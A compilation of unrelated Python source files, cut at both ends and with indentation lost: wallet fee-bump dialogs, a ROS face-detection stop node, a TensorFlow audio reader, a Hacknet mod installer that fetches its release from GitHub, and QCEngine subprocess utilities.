def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
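# Worked example (hypothetical numbers): a 500-byte parent paying 5000 sats
# and a 200-byte child, targeting 20 sat/byte (20000 sat/kB) overall:
# fee = 20000 * 700 / 1000 - 5000 = 9000 sats for the child, then clamped to
# at most max_fee (the child's input value) and at least 1 sat/byte of the
# combined size.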
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
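# propose a starting rate of at least +50% or +1 sat/vbyte over the old one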
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
face_detector_node.py | #!/usr/bin/env python
import rospy
import numpy as np
import math
from duckietown_msgs.msg import Twist2DStamped, LanePose
from sensor_msgs.msg import CompressedImage, Image
from cv_bridge import CvBridge, CvBridgeError
import cv2
import sys
from duckietown_utils.jpg import image_cv_from_jpg
import time
import threading
class lane_controller(object):
def __init__(self):
self.node_name = rospy.get_name()
self.lane_reading = None
self.pub_counter = 0
self.thread_lock = threading.Lock()
self.active = True
# self.stats = Stats()
#cv
self.bridge = CvBridge()
# Publication
self.pub_car_cmd = rospy.Publisher("~car_cmd",Twist2DStamped,queue_size=1)
self.pub_image_original = rospy.Publisher("~image_with_face", Image, queue_size=1)
self.sub_lane_reading = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
# safe shutdown
rospy.on_shutdown(self.custom_shutdown)
# timer
rospy.loginfo("[%s] Initialized " %(rospy.get_name()))
def custom_shutdown(self):
rospy.loginfo("[%s] Shutting down..." %self.node_name)
# Stop listening
self.sub_lane_reading.unregister()
# Send stop command
car_control_msg = Twist2DStamped()
car_control_msg.v = 0.0
car_control_msg.omega = 0.0
self.publishCmd(car_control_msg)
rospy.sleep(0.5) #To make sure that it gets published.
rospy.loginfo("[%s] Shutdown" %self.node_name)
def cbImage(self, image_msg):
# self.status.received()
if not self.active:
return
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.daemon = True
thread.start()
def processImage(self, image_msg):
if not self.thread_lock.acquire(False):
# self.status.skipped()
return
try:
self.cbPose(image_msg)
finally:
self.thread_lock.release()
def publishCmd(self,car_cmd_msg):
self.pub_car_cmd.publish(car_cmd_msg)
def cbPose(self, image_msg):
# self.stats.processed()
#self.lane_reading = lane_pose_msg
#cross_track_err = lane_pose_msg.d - self.d_offset
#heading_err = lane_pose_msg.phi
#img = self.bridge.imgmsg_to_cv2(image_msg)
narr = np.frombuffer(image_msg.data, np.uint8)  # np.fromstring is deprecated
image = cv2.imdecode(narr, cv2.IMREAD_COLOR)  # CV_LOAD_IMAGE_COLOR was removed in OpenCV 3
# image_cv = cv2.imdecode(np.fromstring(image_msg.data, np.uint8), cv2.CV_LOAD_IMAGE_COLOR)
#image_cv = self.bridge.imgmsg_to_cv2(image_msg, "bgr8")
#image = image_cv_from_jpg(image_msg.data)
faceCascade = cv2.CascadeClassifier('/home/ubuntu/duckietown/catkin_ws/src/spring2016_nctu/wama/face_detector/src/haarcascade_frontalface_default.xml')
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# Detect faces in the image
faces = faceCascade.detectMultiScale(gray, scaleFactor=2, minNeighbors=5, minSize=(10, 10), flags=cv2.CASCADE_SCALE_IMAGE)
print "Found {0} faces!".format(len(faces))
for (x, y, w, h) in faces:
cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)
# cv2.imshow("preview", image)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
#cv2.rectangle(image, (100, 100), (120, 140), (0, 255, 0), 2)
image_msg_out = self.bridge.cv2_to_imgmsg(image, "bgr8")
image_msg_out.header.stamp = image_msg.header.stamp
self.pub_image_original.publish(image_msg_out)
#image_msg_out = self.bridge.cv2_to_imgmsg(gray, "bgr8")
#image_msg_out.header.stamp = image_msg.header.stamp
#self.pub_image_gray.publish(image_msg_out)
#face_cascade = cv2.CascadeClassifier('~/haarcascade_frontalface_default.xml')
#eye_cascade = cv2.CascadeClassifier('~/haarcascade_eye.xml')
#gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
#faces = face_cascade.detectMultiScale(gray, 1.3, 5)
#for (x,y,w,h) in faces:
# cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)
# roi_gray = gray[y:y+h, x:x+w]
# roi_color = img[y:y+h, x:x+w]
# self.eyes = eye_cascade.detectMultiScale(roi_gray)
#for (ex,ey,ew,eh) in self.eyes:
# cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)
# cv2.imwrite('hard.png',img)
# cv2.destroyAllWindows()
car_control_msg = Twist2DStamped()
#car_control_msg.header = lane_pose_msg.header
#car_control_msg.v = self.v_bar #*self.speed_gain #Left stick V-axis. Up is positive
#if math.fabs(cross_track_err) > self.d_thres:
# cross_track_err = cross_track_err / math.fabs(cross_track_err) * self.d_thres
#car_control_msg.omega = self.k_d * cross_track_err + self.k_theta * heading_err #*self.steer_gain #Right stick H-axis. Right is negative
# controller mapping issue
# car_control_msg.steering = -car_control_msg.steering
# print "controls: speed %f, steering %f" % (car_control_msg.speed, car_control_msg.steering)
# self.pub_.publish(car_control_msg)
if len(faces) != 0:
car_control_msg.v = 0
car_control_msg.omega = 0
else:
car_control_msg.v = 0.5
car_control_msg.omega = 0
self.publishCmd(car_control_msg)
#rospy.Timer(rospy.Duration.from_sec(1), self.publishCmd(car_control_msg))
#car_control_msg.v=0
#car_control_msg.omega=0
#self.publishCmd(car_control_msg)
# debuging
# self.pub_counter += 1
# if self.pub_counter % 50 == 0:
# self.pub_counter = 1
# print "lane_controller publish"
# print car_control_msg
if __name__ == "__main__":
rospy.init_node("lane_controller",anonymous=False)
lane_control_node = lane_controller()
rospy.spin()
|
audio_reader.py | import fnmatch
import os
import random
import re
import threading
import librosa
import numpy as np
import tensorflow as tf
FILE_PATTERN = r'p([0-9]+)_([0-9]+)\.wav'
def get_category_cardinality(files):
id_reg_expression = re.compile(FILE_PATTERN)
min_id = None
max_id = None
for filename in files:
matches = id_reg_expression.findall(filename)[0]
id, recording_id = [int(id_) for id_ in matches]
if min_id is None or id < min_id:
min_id = id
if max_id is None or id > max_id:
max_id = id
return min_id, max_id
def randomize_files(files):
for file in files:
file_index = random.randint(0, (len(files) - 1))
yield files[file_index]
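# Note: this samples with replacement -- len(files) random picks per pass,
# so a given file may repeat (or be skipped) within a single epoch.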
def find_files(directory, pattern='*.wav'):
'''Recursively finds all files matching the pattern.'''
files = []
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, pattern):
files.append(os.path.join(root, filename))
return files
def load_generic_audio(directory, sample_rate):
'''Generator that yields audio waveforms from the directory.'''
files = find_files(directory)
id_reg_exp = re.compile(FILE_PATTERN)
print("files length: {}".format(len(files)))
randomized_files = randomize_files(files)
for filename in randomized_files:
ids = id_reg_exp.findall(filename)
if not ids:
# The file name does not match the pattern containing ids, so
# there is no id.
category_id = None
else:
# The file name matches the pattern for containing ids.
category_id = int(ids[0][0])
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
audio = audio.reshape(-1, 1)
audio = audio / np.abs(audio).max() * 0.999
yield audio, filename, category_id
def trim_silence(audio, threshold, frame_length=2048):
'''Removes silence at the beginning and end of a sample.'''
if audio.size < frame_length:
frame_length = audio.size
energy = librosa.feature.rmse(audio, frame_length=frame_length)  # renamed to librosa.feature.rms in newer librosa
frames = np.nonzero(energy > threshold)
indices = librosa.core.frames_to_samples(frames)[1]
# Note: indices can be an empty array, if the whole audio was silence.
return audio[indices[0]:indices[-1]] if indices.size else audio[0:0]
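# Example (hedged): for a clip with a quiet head and tail, trim_silence(samples,
# threshold=0.3) keeps only the span between the first and last frames whose
# RMS energy exceeds 0.3; a fully silent clip comes back empty.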
def not_all_have_id(files):
''' Return true iff any of the filenames does not conform to the pattern
we require for determining the category id.'''
id_reg_exp = re.compile(FILE_PATTERN)
for file in files:
ids = id_reg_exp.findall(file)
if not ids:
return True
return False
class AudioReader(object):
'''Generic background audio reader that preprocesses audio files
and enqueues them into a TensorFlow queue.'''
def __init__(self,
audio_dir,
coord,
sample_rate,
gc_enabled,
receptive_field,
sample_size=None,
silence_threshold=None,
queue_size=32):
self.audio_dir = audio_dir
self.sample_rate = sample_rate
self.coord = coord
self.sample_size = sample_size
self.receptive_field = receptive_field
self.silence_threshold = silence_threshold
self.gc_enabled = gc_enabled
self.threads = []
self.sample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.queue = tf.PaddingFIFOQueue(queue_size,
['float32'],
shapes=[(None, 1)])
self.enqueue = self.queue.enqueue([self.sample_placeholder])
if self.gc_enabled:
self.id_placeholder = tf.placeholder(dtype=tf.int32, shape=())
self.gc_queue = tf.PaddingFIFOQueue(queue_size, ['int32'],
shapes=[()])
self.gc_enqueue = self.gc_queue.enqueue([self.id_placeholder])
# TODO Find a better way to check this.
# Checking inside the AudioReader's thread makes it hard to terminate
# the execution of the script, so we do it in the constructor for now.
files = find_files(audio_dir)
if not files:
raise ValueError("No audio files found in '{}'.".format(audio_dir))
if self.gc_enabled and not_all_have_id(files):
raise ValueError("Global conditioning is enabled, but file names "
"do not conform to pattern having id.")
# Determine the number of mutually-exclusive categories we will
# accommodate in our embedding table.
if self.gc_enabled:
_, self.gc_category_cardinality = get_category_cardinality(files)
# Add one to the largest index to get the number of categories,
# since tf.nn.embedding_lookup expects zero-indexing. This
# means one or more at the bottom correspond to unused entries
# in the embedding lookup table. But that's a small waste of memory
# to keep the code simpler, and preserves correspondence between
# the id one specifies when generating, and the ids in the
# file names.
self.gc_category_cardinality += 1
print("Detected --gc_cardinality={}".format(
self.gc_category_cardinality))
else:
self.gc_category_cardinality = None
def dequeue(self, num_elements):
output = self.queue.dequeue_many(num_elements)
return output
def dequeue_gc(self, num_elements):
return self.gc_queue.dequeue_many(num_elements)
def thread_main(self, sess):
stop = False
# Go through the dataset multiple times
while not stop:
iterator = load_generic_audio(self.audio_dir, self.sample_rate)
for audio, filename, category_id in iterator:
if self.coord.should_stop():
stop = True
break
if self.silence_threshold is not None:
# Remove silence
audio = trim_silence(audio[:, 0], self.silence_threshold)
audio = audio.reshape(-1, 1)
if audio.size == 0:
print("Warning: {} was ignored as it contains only "
"silence. Consider decreasing trim_silence "
"threshold, or adjust volume of the audio."
.format(filename))
continue  # actually skip the file, as the warning promises
audio = np.pad(audio, [[self.receptive_field, 0], [0, 0]],
'constant')
if self.sample_size:
# Cut samples into pieces of size receptive_field +
# sample_size with receptive_field overlap
while len(audio) > self.receptive_field:
piece = audio[:(self.receptive_field +
self.sample_size), :]
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: piece})
audio = audio[self.sample_size:, :]
if self.gc_enabled:
sess.run(self.gc_enqueue, feed_dict={
self.id_placeholder: category_id})
else:
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: audio})
if self.gc_enabled:
sess.run(self.gc_enqueue,
feed_dict={self.id_placeholder: category_id})
def start_threads(self, sess, n_threads=1):
for _ in range(n_threads):
thread = threading.Thread(target=self.thread_main, args=(sess,))
thread.daemon = True # Thread will close when parent quits.
thread.start()
self.threads.append(thread)
return self.threads
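# Minimal usage sketch (assumptions: a TF1-style session/coordinator training
# loop as in the reference WaveNet code, and a './corpus' directory of wavs):
#
#   coord = tf.train.Coordinator()
#   reader = AudioReader('./corpus', coord, sample_rate=16000,
#                        gc_enabled=False, receptive_field=5117,
#                        sample_size=100000, silence_threshold=0.3)
#   audio_batch = reader.dequeue(num_elements=1)
#   with tf.Session() as sess:
#       threads = reader.start_threads(sess)
#       ...
#       coord.request_stop()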
|
PathfinderInstaller.py | import os
import platform
import stat
import subprocess
from tkinter import *
from tkinter import filedialog
from tkinter.ttk import *
import shutil
from threading import Thread
import requests
from zipfile import ZipFile
from io import BytesIO
import re
import pathlib
if platform.system() == 'Windows':
from winreg import *
def install_pathfinder(gen_event_callback, hacknet_directory):
url = None
for asset in requests.get('https://api.github.com/repos/Arkhist/Hacknet-Pathfinder/releases').json()[0]['assets']:
if 'Pathfinder.Release' in asset['name']:
url = asset['browser_download_url']
break
if url is None:
gen_event_callback('<<InstallFailure>>')
return
with ZipFile(BytesIO(requests.get(url).content)) as pathfinder_zip:
pathfinder_zip.extractall(path=hacknet_directory)
patcher_exe = os.path.join(hacknet_directory, 'PathfinderPatcher.exe')
if platform.system() == "Linux":
os.chmod(patcher_exe, stat.S_IRWXU)
completed = subprocess.run([patcher_exe], cwd=hacknet_directory)
if completed.returncode != 0:
gen_event_callback('<<InstallFailure>>')
return
try:
os.remove(patcher_exe)
os.remove(os.path.join(hacknet_directory, 'Mono.Cecil.dll'))
hacknet_exe = os.path.join(hacknet_directory, 'Hacknet.exe')
os.rename(hacknet_exe, os.path.join(hacknet_directory, 'HacknetOld.exe'))
os.rename(os.path.join(hacknet_directory, 'HacknetPathfinder.exe'), hacknet_exe)
except OSError:
gen_event_callback('<<InstallFailure>>')
return
gen_event_callback('<<InstallComplete>>')
def try_find_hacknet_dir():
def get_library_folders(vdf_path):
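# Example of the line this regex matches in libraryfolders.vdf (older Steam
# format; newer manifests keep the path under a nested "path" key, which
# this parser does not handle):
#   "1"    "D:\\SteamLibrary"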
with open(vdf_path) as vdf:
matches = re.findall(r'^\s*"[0-9]+"\s*"(.+)"', vdf.read(), flags=re.MULTILINE)
return matches
hacknet_dir = ''
folders = []
if platform.system() == 'Windows':
try:
registry = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
key = OpenKey(registry, r'SOFTWARE\Wow6432Node\Valve\Steam')
root_steamapps = os.path.join(QueryValueEx(key, 'InstallPath')[0], 'steamapps')
folders.append(root_steamapps)
libraries = get_library_folders(os.path.join(root_steamapps, 'libraryfolders.vdf'))
folders.extend([os.path.join(library, 'steamapps') for library in libraries])
except OSError:
return hacknet_dir
else:
home = pathlib.Path.home()
steam_root = None
possible_roots = [
os.path.join(home, '.local', 'share', 'Steam'),
os.path.join(home, '.steam', 'steam'),
os.path.join(home, '.steam', 'root'),
os.path.join(home, '.steam'),
os.path.join(home, '.var', 'app', 'com.valvesoftware.Steam', '.local', 'share', 'steam'),
os.path.join(home, '.var', 'app', 'com.valvesoftware.Steam', '.steam', 'steam'),
os.path.join(home, '.var', 'app', 'com.valvesoftware.Steam', '.steam', 'root'),
os.path.join(home, '.var', 'com.valvesoftware.Steam', '.steam')
]
for dir in possible_roots:
if not os.path.exists(dir) or not os.path.exists(os.path.join(dir, 'steam.sh')):
continue
steam_root = dir
break
if steam_root is None:
return hacknet_dir
possible_steamapps = [
os.path.join(steam_root, 'steamapps'),
os.path.join(steam_root, 'steam', 'steamapps'),
os.path.join(steam_root, 'root', 'steamapps')
]
root_steamapps = None
for possible_steamapp in possible_steamapps:
if os.path.exists(possible_steamapp):
root_steamapps = possible_steamapp
break
if root_steamapps is None:
return hacknet_dir
folders.append(root_steamapps)
libraries = get_library_folders(os.path.join(root_steamapps, 'libraryfolders.vdf'))
for library in libraries:
# os.path.join(library, abs_path) would just return abs_path, so check the
# library's own steamapps folder directly
library_steamapps = os.path.join(library, 'steamapps')
if os.path.exists(library_steamapps):
folders.append(library_steamapps)
for folder in folders:
hacknet_acf = os.path.join(folder, 'appmanifest_365450.acf')
if not os.path.exists(hacknet_acf):
continue
hacknet_dir_candidate = os.path.join(folder, 'common', 'Hacknet')
hacknet_exe = os.path.join(hacknet_dir_candidate, 'Hacknet.exe')
if not os.path.exists(hacknet_dir_candidate) or not os.path.exists(hacknet_exe):
continue
hacknet_dir = hacknet_dir_candidate
return hacknet_dir
class App(Frame):
def __init__(self, master: Tk):
super().__init__(master)
self.master = master
self.master.bind('<<InstallComplete>>', self.install_complete)
self.master.bind('<<InstallFailure>>', self.install_failure)
self.content = Frame(self.master)
self.file_frame = Frame(self.content)
self.dir_label = Label(self.file_frame, text='Hacknet Folder')
self.hacknet_directory = StringVar()
self.hacknet_directory.set(try_find_hacknet_dir())
self.dir = Entry(self.file_frame, textvariable=self.hacknet_directory)
self.reopen_button = Button(self.file_frame, text='Open Directory Select', command=self.open_dir)
self.button_frame = Frame(self.content)
self.install_button = Button(self.button_frame, text='Install', command=self.install)
self.uninstall_button = Button(self.button_frame, text='Uninstall', command=self.uninstall)
self.setup_grid()
self.progress = None
def setup_grid(self):
self.master.title('Pathfinder Installer')
self.master.geometry("750x75")
self.master.resizable(FALSE, FALSE)
self.content.grid(column=0, row=0, sticky='NSEW')
self.file_frame.grid(column=0, row=0, sticky='NSEW')
self.dir_label.grid(column=0, row=0, padx=(5, 0))
self.dir.grid(column=1, row=0, columnspan=2, padx=5, sticky='EW')
self.reopen_button.grid(column=3, row=0, padx=(0, 5))
self.button_frame.grid(column=0, row=1, pady=(0, 5))
self.install_button.grid(column=0, row=0, padx=(0, 20))
self.uninstall_button.grid(column=1, row=0, padx=(20, 0))
self.master.columnconfigure(0, weight=1)
self.master.rowconfigure(0, weight=1)
self.content.columnconfigure(0, weight=1)
self.content.rowconfigure(0, weight=1)
self.content.rowconfigure(1, weight=1)
self.file_frame.columnconfigure(1, weight=1)
self.file_frame.rowconfigure(0, weight=1)
def open_dir(self):
self.hacknet_directory.set(filedialog.askdirectory())
def install(self):
hacknet_dir = self.hacknet_directory.get()
if not self.valid_directory(hacknet_dir):
return
self.progress = Progressbar(self.button_frame, orient=HORIZONTAL, length=500, mode='indeterminate')
self.progress.grid(column=0, row=0, columnspan=2)
self.progress.start()
Thread(target=install_pathfinder, args=(self.master.event_generate, hacknet_dir)).start()
def install_complete(self, event):
self.make_message_box('Installation Complete!', title='Success')
self.progress.destroy()
self.progress = None
def install_failure(self, event):
self.make_message_box('Installation failed, this may have left an unfinished installation in your Hacknet folder!', title='Failure')
self.progress.destroy()
self.progress = None
return
def uninstall(self):
hacknet_dir = self.hacknet_directory.get()
if not self.valid_directory(hacknet_dir):
return
hacknet_exe_path = os.path.join(hacknet_dir, 'Hacknet.exe')
old_hacknet_path = os.path.join(hacknet_dir, 'HacknetOld.exe')
if not os.path.exists(old_hacknet_path):
self.make_message_box('Could not find HacknetOld.exe, are you sure Pathfinder is installed (and was installed by this installer)?', title='Error!')
return
try:
os.remove(hacknet_exe_path)
os.rename(old_hacknet_path, hacknet_exe_path)
shutil.rmtree(os.path.join(hacknet_dir, 'BepInEx'), ignore_errors=True)
except OSError:
self.make_message_box('Failed to clean up all files, you may be left with an incomplete uninstall!', title='Error!')
return
self.make_message_box('Pathfinder successfully uninstalled', title='Success')
def valid_directory(self, directory):
valid = True
if not os.path.exists(directory):
valid = False
self.make_message_box(f'The directory {directory} does not exist!', title='Error!')
elif not os.path.exists(os.path.join(directory, 'Hacknet.exe')):
valid = False
self.make_message_box(f'The directory {directory} does not contain a file called Hacknet.exe!', title='Error!')
return valid
def make_message_box(self, message, title='Message'):
message_box = Toplevel(self.master)
message_box.resizable(FALSE, FALSE)
message_box.title(title)
message_frame = Frame(message_box)
message_frame.grid()
Label(message_frame, text=message).grid(column=0, row=0, padx=5, pady=5)
Button(message_frame, text='Ok', command=message_box.destroy).grid(column=0, row=1, pady=5)
root = Tk()
app = App(root)
root.mainloop()
|
util.py | """
Code taken from https://github.com/andrew-abimansour/QCEngine
Provides QCEngine utils for executing a process, with support for handling large data files.
"""
from typing import Tuple, Dict, Optional, Any, List, Union, BinaryIO, TextIO
from threading import Thread
import time
from contextlib import contextmanager
from pathlib import Path
from functools import partial
import tempfile
import shutil
import sys
import os
import subprocess
import io
import signal
def terminate_process(proc: Any, timeout: int = 15) -> None:
if proc.poll() is None:
# SIGINT (keyboard interrupt)
if sys.platform.startswith("win"):
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGINT)
try:
start = time.time()
while (proc.poll() is None) and (time.time() < (start + timeout)):
time.sleep(0.02)
# Flat kill
finally:
proc.kill()
@contextmanager
def temporary_directory(
child: str = None,
*,
parent: str = None,
suffix: str = None,
messy: bool = False,
exist_ok: bool = False,
) -> str:
"""Create and cleanup a quarantined working directory with a parent scratch directory.
Parameters
----------
child : str, optional
By default, `None`: the quarantine directory is generated through
`tempfile.mkdtemp`, so it is guaranteed unique and safe. When specified,
the quarantine directory is named exactly `child`.
parent : str, optional
Create directory `child` elsewhere than TMP default.
For TMP default, see https://docs.python.org/3/library/tempfile.html#tempfile.gettempdir
suffix : str, optional
Create `child` with identifying label by passing to ``tempfile.mkdtemp``.
Encouraged use for debugging only.
messy : bool, optional
Leave scratch directory and contents on disk after completion.
exist_ok : bool, optional
Run commands in a possibly pre-existing directory.
Yields
------
str
Full path of scratch directory.
Raises
------
FileExistsError
If `child` specified and directory already exists (perhaps from a
previous `messy=True` run).
Examples
--------
parent child suffix --> creates
------ ----- ------ -------
None None None --> /tmp/tmpliyp1i7x/
None None _anharm --> /tmp/tmpliyp1i7x_anharm/
None myqcjob None --> /tmp/myqcjob/
/scratch/johndoe None None --> /scratch/johndoe/tmpliyp1i7x/
/scratch/johndoe myqcjob None --> /scratch/johndoe/myqcjob/
"""
if child is None:
tmpdir = Path(tempfile.mkdtemp(dir=parent, suffix=suffix))
else:
if parent is None:
parent = Path(tempfile.gettempdir())
else:
parent = Path(parent)
tmpdir = parent / child
try:
os.mkdir(tmpdir)
except FileExistsError:
if exist_ok:
pass
else:
raise
try:
yield tmpdir
finally:
if not messy:
shutil.rmtree(tmpdir)
@contextmanager
def popen(
args: List[str],
append_prefix: bool = False,
popen_kwargs: Optional[Dict[str, Any]] = None,
pass_output_forward: bool = False,
) -> Dict[str, Any]:
"""
Opens a background task
Code and idea from dask.distributed's testing suite
https://github.com/dask/distributed
Parameters
----------
args: List[str]
Input arguments for the command
append_prefix: bool
Whether to prepend the Python path prefix to the command being executed
popen_kwargs: Dict[str, Any]
Any keyword arguments to use when launching the process
pass_output_forward: bool
Whether to pass the stdout and stderr forward to the system's stdout and stderr
Returns
-------
exe: dict
Dictionary with the following keys:
- proc: Popen object describing the background task
- stdout: String value of the standard output of the task
- stderr: String value of the standard error of the task
"""
args = list(args)
if popen_kwargs is None:
popen_kwargs = {}
else:
popen_kwargs = popen_kwargs.copy()
# Bin prefix
if sys.platform.startswith("win"):
bin_prefix = os.path.join(sys.prefix, "Scripts")
else:
bin_prefix = os.path.join(sys.prefix, "bin")
# Do we prefix with Python?
if append_prefix:
args[0] = os.path.join(bin_prefix, args[0])
if sys.platform.startswith("win"):
# Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT
popen_kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
# Route the standard error and output
popen_kwargs["stdout"] = subprocess.PIPE
popen_kwargs["stderr"] = subprocess.PIPE
# Prepare StringIO objects to store the stdout and stderr
stdout = io.BytesIO()
stderr = io.BytesIO()
# Ready the output
ret = {"proc": subprocess.Popen(args, **popen_kwargs)}
# Spawn threads that will read from the stderr/stdout
# The PIPE uses a buffer with finite capacity. The underlying
# process will stall if it is unable to write to the buffer
# because the buffer is full. These threads continuously read
# from the buffers to ensure that they do not fill.
#
def read_from_buffer(buffer: BinaryIO, storage: io.BytesIO, sysio: TextIO):
for r in iter(partial(buffer.read, 1024), b""):
storage.write(r)
if pass_output_forward:
sysio.write(r.decode())
stdout_reader = Thread(
target=read_from_buffer, args=(ret["proc"].stdout, stdout, sys.stdout)
)
stdout_reader.start()
stderr_reader = Thread(
target=read_from_buffer, args=(ret["proc"].stderr, stderr, sys.stderr)
)
stderr_reader.start()
# Yield control back to the main thread
try:
yield ret
finally:
# Executes on an exception or once the context manager closes
try:
terminate_process(ret["proc"])
finally:
# Wait for the reader threads to finish
stdout_reader.join()
stderr_reader.join()
# Retrieve the standard output for the process
ret["stdout"] = stdout.getvalue().decode()
ret["stderr"] = stderr.getvalue().decode()
@contextmanager
def disk_files(
infiles: Dict[str, Union[str, bytes]],
outfiles: Dict[str, None],
*,
cwd: Optional[str] = None,
as_binary: Optional[List[str]] = None,
outfiles_track: Optional[List[str]] = None,
) -> Dict[str, Union[str, bytes, Path]]:
"""Write and collect files.
Parameters
----------
infiles : Dict[str, str]
Input file names (names, not full paths) and contents,
to be written in the scratch dir. May be {}.
outfiles : Dict[str, None]
Output file names to be collected after execution into
values. May be {}.
cwd : str, optional
Directory to which to write and read files.
as_binary : List[str] = None
Keys in `infiles` (`outfiles`) to be written (read) as bytes, not decoded.
outfiles_track: List[str], optional
Keys of `outfiles` to keep track of (i.e. file contents not loaded in memory).
For specified filename in `outfiles_track`, the file path instead of contents
is stored in `outfiles`.
Yields
------
Dict[str, Union[str, bytes, Path]]
outfiles with RHS filled in.
"""
if cwd is None:
lwd = Path.cwd()
else:
lwd = Path(cwd)
if as_binary is None:
as_binary = []
assert set(as_binary) <= (set(infiles) | set(outfiles))
outfiles_track = outfiles_track or []
try:
for fl, content in infiles.items():
omode = "wb" if fl in as_binary else "w"
filename = lwd / fl
with open(filename, omode) as fp:
fp.write(content)
yield outfiles
finally:
outfiles_track = [
fpath.name if "*" in track else track
for track in outfiles_track
for fpath in lwd.glob(track)
]
for fl in outfiles.keys():
filename = lwd / fl
omode = "rb" if fl in as_binary else "r"
try:
with open(filename, omode) as fp:
if fl not in outfiles_track:
outfiles[fl] = fp.read()
else:
outfiles[fl] = filename
except OSError:  # FileNotFoundError is a subclass of OSError
if "*" in fl:
gfls = {}
for gfl in lwd.glob(fl):
with open(gfl, omode) as fp:
if gfl.name not in outfiles_track:
gfls[gfl.name] = fp.read()
else:
gfls[gfl.name] = gfl
if not gfls:
gfls = None
outfiles[fl] = gfls
else:
outfiles[fl] = None
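# Minimal sketch of disk_files on its own (assumes the current directory is
# writable; in real use an external command produces 'out.txt' inside the
# with-block):
#
#   collected = {'out.txt': None}
#   with disk_files({'in.txt': 'hello'}, collected, cwd='.') as out:
#       Path('out.txt').write_text(Path('in.txt').read_text().upper())
#   print(collected['out.txt'])  # -> 'HELLO'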
def execute(
command: List[str],
infiles: Optional[Dict[str, str]] = None,
outfiles: Optional[List[str]] = None,
*,
outfiles_track: Optional[List[str]] = None,
